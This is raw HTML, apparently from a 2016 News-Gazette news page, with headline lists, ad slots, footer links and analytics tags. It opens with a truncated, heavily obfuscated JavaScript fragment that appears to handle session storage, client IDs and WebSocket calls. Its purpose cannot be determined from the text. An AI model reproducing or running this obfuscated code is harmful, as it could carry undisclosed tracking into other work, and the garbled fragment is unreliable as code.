v^472])^Hw=^$7^Uv^474])[0];@kebSocket= w^67^2[75]];^$7^Uv^474^5[77^/70],^3n^8^^})})}^-79^P^;y){^Nif(^(^081]){get@rserI@n();^F^@if(o^659^/82])>  -1){j= @tS@jN^68^Q^()^HC^,4^?D^,5^?z^,6^?@m^,7^?@q^,8^?x=D^489]+ z^489]+ C^489]+ @m;ses^]Storage^690^/55],x^_@q^_x)^@if(g== ^V){j= @tS@jN^68^Q^();@q= j^685]];^SC^W= j^647]];f(@q^_^SC^W);g= false^@j= @tS@jN^68^Q^();@q= j^688]];f(@q^_h)}}};^N^1}catch(e){^N^1}}}^Hf=^;@p^GE^"9]^*;E^610^+11];E^613^+91]+ escape(@p);^#69]]^649]](E)};^F {init:k,^>:^>,start:n}}();if(window^692]]^616]]== ^#16]]){^S^A^69^Q)}~_gaConverter_^S._~_1825[2]](^6~=^#~document^6~j@yuery^8~","^.~]]= ^3~unction(^G~y^680]]~ate@mnalytics~]^88])~]]= ^=~=j^68~};p^6~^S@wegular~]]^8~== ^=~}catch(e){}~6]][_$_1825~^;){~+ ^=~])[_$_1825~[^=~^=3~(^=~analytics~]);^a[_~func^Z(~],_$_1825~_$_1825[~clientID~]^E~}else {~_widget~","http~iframe~do^S~]^H~return~){^[~;^[~","on~||","~cript~e","~d","~try{~=@e"~]]= ~3]](~","s~main~","@~3]+ ~true~heck~s://~m","~tion~var ~","u~sion~47])~);f(~]|| ~_gaq~4]+ '));

                    /*end JS*/

                </script>
                <div id="contentad164511"></div>
                <script type="text/javascript">
                    (function(d) {
                        var params =
                        {
                            id: "0b86b6e2-77b2-4636-9786-39853ccd059e",
                            d:  "bmV3cy1nYXpldHRlLmNvbQ==",
                            wid: "164511",
                            cb: (new Date()).getTime()
                        };

                        var qs=[];
                        for(var key in params) qs.push(key+'='+encodeURIComponent(params[key]));
                        var s = d.createElement('script');s.type='text/javascript';s.async=true;
                        var p = 'https:' == document.location.protocol ? 'https' : 'http';
                        s.src = p + "://api.content.ad/Scripts/widget2.aspx?" + qs.join('&');
                        d.getElementById("contentad164511").appendChild(s);
                    })(document);
                </script>

            
                    <div id="comment-info-wrapper">
                <h3>Comments</h3>
                <div class="well bg-warning">
                <p><em>News-Gazette.com embraces discussion of both community and world issues. We welcome you to contribute your ideas, opinions and comments, but we ask that you avoid personal attacks, vulgarity and hate speech. We reserve the right to remove any comment at our discretion, and we will block repeat offenders' accounts. To post comments, you must first be a registered user, and your username will appear with any comment you post. Happy posting.</em></p>
                </div>
            </div>
                            <p><a href="/user/login?destination=comment/reply/1475795#comment-form">Login</a> or <a href="/user/register?destination=comment/reply/1475795#comment-form">register</a> to post comments</p>
                                </div>

                </div>
                                </div>

            </div> <!-- /content-content -->

          <div class="col-md-4 hard">
    <div id="sidebar" class="col-md-12 sidebar">
        <div id="second-logo">
                    </div>

        <div id="block-block-310" class="clear-block block block-block ad-block">


  <div class="content"><!-- /4073248/NG_ROS_Half_Page -->
<div id='div-gpt-ad-1443199567549-0' style='height:600px; width:300px;'>
<script type='text/javascript'>
googletag.cmd.push(function() { googletag.display('div-gpt-ad-1443199567549-0'); });
</script>
</div>
</div>
</div>
<div id="block-views-front_page_headlines-block_1" class="clear-block block block-views block-section">

  <h2>Latest News</h2>

  <div class="content"><div class="view view-front-page-headlines view-id-front_page_headlines view-display-id-block_1 view-dom-id-2">
    
  
  
      <div class="view-content">
      <div class="item-list">
    <ul id="">
          <li class="views-row views-row-1 views-row-odd views-row-first">  
  <div class="views-field-title">
                <span class="field-content"><a href="/news/local/2016-09-16/probation-fibbing-urbana-teen.html" class="article-wd icon-Story" data-timestamp="Fri Sep 16 2016 13:40:12 -0500">Probation for fibbing Urbana teen</a></span>
  </div>
</li>
          <li class="views-row views-row-2 views-row-even">  
  <div class="views-field-title">
                <span class="field-content"><a href="/news/state/2016-09-16/teen-who-sits-during-pledge-being-withdrawn-school.html" class="article-wd icon-Story" data-timestamp="Fri Sep 16 2016 13:00:00 -0500">Teen who sits during pledge being withdrawn from school</a></span>
  </div>
</li>
          <li class="views-row views-row-3 views-row-odd">  
  <div class="views-field-title">
                <span class="field-content"><a href="/news/local/2016-09-16/monticello-gets-eight-figure-loan-water-plant-work.html" class="article-wd icon-Story" data-timestamp="Fri Sep 16 2016 12:35:36 -0500">Monticello gets eight figure loan for water plant work</a></span>
  </div>
</li>
          <li class="views-row views-row-4 views-row-even">  
  <div class="views-field-title">
                <span class="field-content"><a href="/news/nationworld/2016-09-16/brain-cancer-now-leading-childhood-cancer-killer.html" class="article-wd icon-Story" data-timestamp="Fri Sep 16 2016 12:00:00 -0500">Brain cancer now leading childhood cancer killer</a></span>
  </div>
</li>
          <li class="views-row views-row-5 views-row-odd">  
  <div class="views-field-title">
                <span class="field-content"><a href="/news/nationworld/2016-09-16/obama-says-most-people-know-he-was-born-us.html" class="article-wd icon-Story" data-timestamp="Fri Sep 16 2016 10:36:01 -0500">Obama says most people know he was born in U.S.</a></span>
  </div>
</li>
          <li class="views-row views-row-6 views-row-even">  
  <div class="views-field-title">
                <span class="field-content"><a href="/news/nationworld/2016-09-16/north-korea-rushes-get-supplies-shelter-flood-victims.html" class="article-wd icon-Story" data-timestamp="Fri Sep 16 2016 10:00:03 -0500">North Korea rushes to get supplies, shelter to flood victims</a></span>
  </div>
</li>
          <li class="views-row views-row-7 views-row-odd">  
  <div class="views-field-title">
                <span class="field-content"><a href="/news/nationworld/2016-09-16/trump-campaign-finally-admits-obama-born-us.html" class="article-wd icon-Story" data-timestamp="Fri Sep 16 2016 10:00:03 -0500">Trump campaign finally admits Obama born in U.S.</a></span>
  </div>
</li>
          <li class="views-row views-row-8 views-row-even">  
  <div class="views-field-title">
                <span class="field-content"><a href="/news/state/2016-09-16/ex-winnebago-official-gets-2-years-440000-theft.html" class="article-wd icon-Story" data-timestamp="Fri Sep 16 2016 10:00:03 -0500">Ex-Winnebago official gets 2 years for $440,000 theft</a></span>
  </div>
</li>
          <li class="views-row views-row-9 views-row-odd">  
  <div class="views-field-title">
                <span class="field-content"><a href="/news/nationworld/2016-09-16/full-inquiry-vowed-fatal-police-shooting-boy-13.html" class="article-wd icon-Story" data-timestamp="Fri Sep 16 2016 10:00:01 -0500">Full inquiry vowed in fatal police shooting of boy, 13</a></span>
  </div>
</li>
          <li class="views-row views-row-10 views-row-even views-row-last">  
  <div class="views-field-title">
                <span class="field-content"><a href="/news/nationworld/2016-09-16/fishermen-upset-over-creation-atlantics-first-monument.html" class="article-wd icon-Story" data-timestamp="Fri Sep 16 2016 10:00:03 -0500">Fishermen upset over creation of Atlantic&#039;s first monument</a></span>
  </div>
</li>
      </ul>
</div>    </div>
  
  
  
  
      <div class="view-footer">
      <a class="tax-readmore" href="/news/local">More Local News</a><br />    </div>
  
  
</div> </div>
</div>
<div id="block-block-312" class="clear-block block block-block ad-block">


  <div class="content"><!-- /4073248/NG_Home_Midrail -->
<div id='div-gpt-ad-1443203983873-0' style='height:250px; width:300px;'>
<script type='text/javascript'>
googletag.cmd.push(function() { googletag.display('div-gpt-ad-1443203983873-0'); });
</script>
</div>
<div class="clearfix"></div></div>
</div>

			<div class="wdwsSection">
				            </div>

			<div class="block-section">
				            </div>

                <div id="halfPage" class="col-md-12"></div>
        <div class="clear"></div>

        <div id="block-custom_front-6" class="clear-block block block-custom_front block-section most">

  <h2>Most Viewed News</h2>

  <div class="content"><ul>
      <li><a href="/multimedia/photogallery/2016-09-09/tornado-near-homer">Tornado near Homer</a></li>
      <li><a href="/news/local/2016-09-08/man-would-rather-get-fired-watch-diversity-video.html">Man would rather get fired than watch diversity video</a></li>
      <li><a href="/news/local/2016-09-13/update-urbana-man-gets-20-years-despite-tearful-plea.html">UPDATE: Urbana man gets 20 years despite tearful plea</a></li>
      <li><a href="/image/2016-09-15/one-taken-hospital-after-late-night-wreck-west-champaign.html">One taken to hospital after late-night wreck in west Champaign</a></li>
      <li><a href="/news/local/2016-09-10/updated-tornado-leaves-damage-its-wake.html">UPDATED: Tornado leaves damage in its wake</a></li>
  </ul></div>
</div>
<div id="block-custom_front-7" class="clear-block block block-custom_front block-section most">

  <h2>Most Commented News</h2>

  <div class="content"><ul>
      <li><a href="/news/local/2016-09-14/champaign-city-staff-work-willard-east-coast-connection.html">Champaign city staff to work with Willard on East Coast connection</a></li>
      <li><a href="/news/local/2016-09-12/updated-wilson-ui-promotion-i%E2%80%99m-ready-next-opportunity.html">UPDATED: Wilson on UI promotion: &#039;I’m ready for the next opportunity&#039;</a></li>
      <li><a href="/news/local/2016-09-15/without-deputies-would-not-have-had-good-ending.html">Without deputies, &#039;this would not have had a good ending&#039;</a></li>
      <li><a href="/news/local/2016-09-15/willard-changes-parking-food-hangar.html">Willard changes: Parking, food, hangar</a></li>
      <li><a href="/news/local/2016-09-13/champaign-school-district-salaries-detailed-board.html">Champaign school district salaries detailed for board</a></li>
  </ul></div>
</div>
    </div>
</div>
          </div><!--#content -->
	    </div>
	      </section><!-- /section -->
<div id="meter-slide-container"></div>
</div><!--end of the container div-->

<footer>
<div class="clearfix"></div>
        <!--        The footer region-->
        <div class="first-footer">
            <div class="container">
                <div class="col-md-12">
                    <div id="block-custom_front-10" class="clear-block block block-custom_front ">


  <div class="content"><div id="trending">
    <h2>Trending Now</h2>
    <div class="col-md-4 col-sm-6 col-xs-12 featured-trending">
        <h3><a href="/news/local/2016-09-15/update-police-seeking-teen-driver-crashed-stolen-vehicle.html" class="icon-story">UPDATE: Police seeking teen driver of crashed stolen vehicle </a></h3>
        <a href="/news/local/2016-09-15/update-police-seeking-teen-driver-crashed-stolen-vehicle.html"><img src="http://static.news-gazette.com/sites/all/files/imagecache/300x300_width_height_scale/images/2016/09/15/0916_LOCA_2Accident_copy.jpg" alt="UPDATE: Police seeking teen driver of crashed stolen vehicle " title="UPDATE: Police seeking teen driver of crashed stolen vehicle "  class="imagecache imagecache-300x300_width_height_scale" width="300" height="148" /></a>
    </div>

    <div class="col-md-8 col-sm-6 col-xs-12">
        <ul id="trending-list">
                     <li><a href="/image/2016-09-15/one-taken-hospital-after-late-night-wreck-west-champaign.html" class="icon-image">One taken to hospital after late-night wreck in west Champaign</a></li>
                     <li><a href="/courts-police-fire/2016-09-15/update-suspect-custody-after-social-media-threat.html" class="icon-story">UPDATE: Suspect in custody after social media threat</a></li>
                     <li><a href="/news/local/2016-09-15/without-deputies-would-not-have-had-good-ending.html" class="icon-story">Without deputies, 'this would not have had a good ending'</a></li>
                     <li><a href="/sports/prep-sports/football/2016-09-14/iw-administration-supports-football-coach.html" class="icon-story">IW administration supports football coach</a></li>
                     <li><a href="/news/local/2016-09-14/airport-wars-peoria-makes-push.html" class="icon-story">Airport wars: Peoria makes a push</a></li>
                     <li><a href="/news/local/2016-09-16/record-55-days-without-shooting-victim-champaign.html" class="icon-story">For the record: 55 days without a shooting victim in Champaign</a></li>
                     <li><a href="/news/local/2016-09-13/update-urbana-man-gets-20-years-despite-tearful-plea.html" class="icon-story">UPDATE: Urbana man gets 20 years despite tearful plea</a></li>
                     <li><a href="/sports/prep-sports/boys-basketball/2016-09-14/illini-commit-tilmon-target-finke-meet-opener.html" class="icon-story">Illini commit (Tilmon), target (Finke) to meet in opener</a></li>
                     <li><a href="/sports/illini-sports/mens-basketball/2016-09-14/tate-mens-hoops-ready-take-next-step.html" class="icon-story">Tate: Men's hoops ready to take next step</a></li>
                     <li><a href="/news/local/2016-09-14/high-school-confidential-week-1.html" class="icon-story">High School Confidential: Week 1</a></li>
                 </ul>
    </div>

</div></div>
</div>
            </div></div>
        </div>
        <div class="second-footer">
            <div class="container">
                <div class="col-md-12">
                    <div id="block-block-272" class="clear-block block block-block ">


  <div class="content"><div class="networkLinks">
<div class="col-md-3 radioAir">
<h3>Radio</h3>
<ul>
<li><a href="http://wdws.com" title="">Newstalk 1400 WDWS-AM</a></li>
<li><a href="http://whms.com" title="">Lite Rock 97.5 WHMS-FM</a></li>
<li><a href="http://www.1079wkio.com" title="">Classic Hits 107.9 WKIO-FM</a></li>
</ul>
</div>
<div class="col-md-6 print">
<h3>Print</h3>
<ul>
<li><a href="http://www.county-star.com" title="">County Star</a></li>
<li><a href="http://the-independent-news.com" title="">The Independent News</a></li>
<li><a href="http://www.leaderlandnews.com" title="">The Leader</a></li>
<li><a href="http://leroyfcpress.com" title="">LeRoy Farmer City Press</a></li>
<li><a href="http://www.mcitizen.com" title="">Mahomet Citizen</a></li>
<li><a href="http://paxtonrecord.net" title="">Paxton Record</a></li>
<li><a href="http://journal-republican.com" title="">Journal Republican</a></li>
<li><a href="http://www.rantoulpress.com" title="">Rantoul Press</a></li>
</ul>
</div>
<div class="col-md-3 magazines">
<h3>Magazines</h3>
<ul>
<li><a href="http://athomeillinois.com" title="At Home Magazine">At Home Magazine</a></li>
<li><a href="http://www.centralillinoisbusiness.com" title="Central Illinois Business Magazine">Central Illinois Business Magazine</a></li>
</ul>
</div>
</div></div>
</div>
            </div></div>
        </div>
        <div class="third-footer">
            <div class="container">
                <div class="col-md-12">
                    <div id="block-menu-menu-customer-service" class="clear-block block block-menu col-md-4">

  <h2>Customer Service</h2>

  <div class="content"><ul class="menu"><li class="leaf first"><a href="/section/services" title="">Help</a></li>
<li class="leaf"><a href="/contact" title="">Contact Us</a></li>
<li class="leaf"><a href="/section/services/online-services/terms-use.html" title="">Terms of Use</a></li>
<li class="leaf"><a href="/section/services/online-services/news-gazette-online-privacy-policy.html" title="">Privacy Policy</a></li>
<li class="leaf"><a href="http://members.news-gazette.com/faq" title="Frequently Asked Questions">Frequently Asked Questions</a></li>
<li class="leaf last"><a href="http://members.news-gazette.com" title="Subscription Information">Subscription Information</a></li>
</ul></div>
</div>
<div id="block-menu-menu-quick-links" class="clear-block block block-menu col-md-4">

  <h2>Quick Links</h2>

  <div class="content"><ul class="menu"><li class="leaf first"><a href="http://eedition.news-gazette.com" title="eEdition">eEdition</a></li>
<li class="leaf"><a href="/obituaries" title="Obituaries">Obituaries</a></li>
<li class="leaf"><a href="/section/services/subscriber-services/vacation-stop.html" title="Submit a Vacation Stop">Submit Vacation Stop</a></li>
<li class="leaf"><a href="/staff" title="">Staff List</a></li>
<li class="leaf"><a href="/store/services/online-services/pay-your-news-gazette-bill-online.html" title="Pay your Subscription">Pay your Subscription</a></li>
<li class="leaf"><a href="http://www.news-gazette.com/section/services/general-services/news-gazette-buy-photos.html" title="Buy a Photo">Buy a Photo</a></li>
<li class="leaf"><a href="/contact/tips" title="Send a News Tip">Send a News Tip</a></li>
<li class="leaf last"><a href="/section/services/reader-services/submission-forms.html" title="">Submit an Announcement</a></li>
</ul></div>
</div>
<div id="block-block-274" class="clear-block block block-block col-md-4">


  <div class="content"><div class="ng-block"><img src="/sites/all/themes/custom/ng_fbg/images/ng_logo_white.png" /><br />
<p class="offer">Start a subscription now to enjoy our award-winning local news and sports coverage. Print, digital, or both-- we've got you covered.</p>
<p class="text-center"><a class="btn btn-primary btn-subscribe" href="http://members.news-gazette.com">Subscribe</a></p>
</div>
</div>
</div>
                    <div id="block-block-271" class="clear-block block block-block col-md-6">

  <h2>Connect with The News-Gazette</h2>

  <div class="content"><div class="socialBtns">
<a href="http://facebook.com/NewsGazette"><img src="/sites/all/themes/custom/ng_fbg/images/64-facebook.png"></a>
<a href="https://www.linkedin.com/company/the-news-gazette"><img src="/sites/all/themes/custom/ng_fbg/images/64-linkedin.png"></a>
<a href="http://twitter.com/news_gazette"><img src="/sites/all/themes/custom/ng_fbg/images/64-twitter.png"></a>
<a href="https://instagram.com/news_gazette/"><img src="/sites/all/themes/custom/ng_fbg/images/64-instagram.png"></a>
<a href="http://www.news-gazette.com/rss.xml"><img src="/sites/all/themes/custom/ng_fbg/images/64-rss.png"></a>
</div></div>
</div>
<div id="block-block-275" class="clear-block block block-block col-md-6">


  <div class="content"><div class="copyright">© 1995-2015 The News-Gazette, Inc. | All Rights Reserved | 15 Main St., Champaign, IL 61820</div></div>
</div>
                </div></div>
        </div>
        <!--            End of footer region-->

	</footer>
    <div id="mobileBanner"></div>
</body>

<!-- JavaScript at the bottom for fast page loading -->
<!-- HTML5 IE Enabling Script -->
<!--[if lt IE 9]><script src="http://html5shim.googlecode.com/svn/trunk/html5.js"></script><![endif]-->
<!-- CSS3 Media Queries -->
<script src="/sites/all/themes/custom/ng_fbg/js/respond.js"></script>

    <!-- Quantcast Tag -->
    <script type="text/javascript">
        var _qevents = _qevents || [];

        (function() {
            var elem = document.createElement('script');
            elem.src = (document.location.protocol == "https:" ? "https://secure" : "http://edge") + ".quantserve.com/quant.js";
            elem.async = true;
            elem.type = "text/javascript";
            var scpt = document.getElementsByTagName('script')[0];
            scpt.parentNode.insertBefore(elem, scpt);
        })();

        _qevents.push({
            qacct:"p-a15Hs4ofKGnVw"
        });
    </script>

    <noscript>
        <div style="display:none;">
            <img src="//pixel.quantserve.com/pixel/p-a15Hs4ofKGnVw.gif" border="0" height="1" width="1" alt="Quantcast"/>
        </div>
    </noscript>
    <!-- End Quantcast tag -->


  <script type="text/javascript">
<!--//--><![CDATA[//><!--
var _gaq = _gaq || [];_gaq.push(["_setAccount", "UA-4954131-2"]);_gaq.push(["_trackPageview"]);(function() {var ga = document.createElement("script");ga.type = "text/javascript";ga.async = true;ga.src = "/sites/all/files/googleanalytics/ga.js?B";var s = document.getElementsByTagName("script")[0];s.parentNode.insertBefore(ga, s);})();
//--><!]]>
</script>
</html>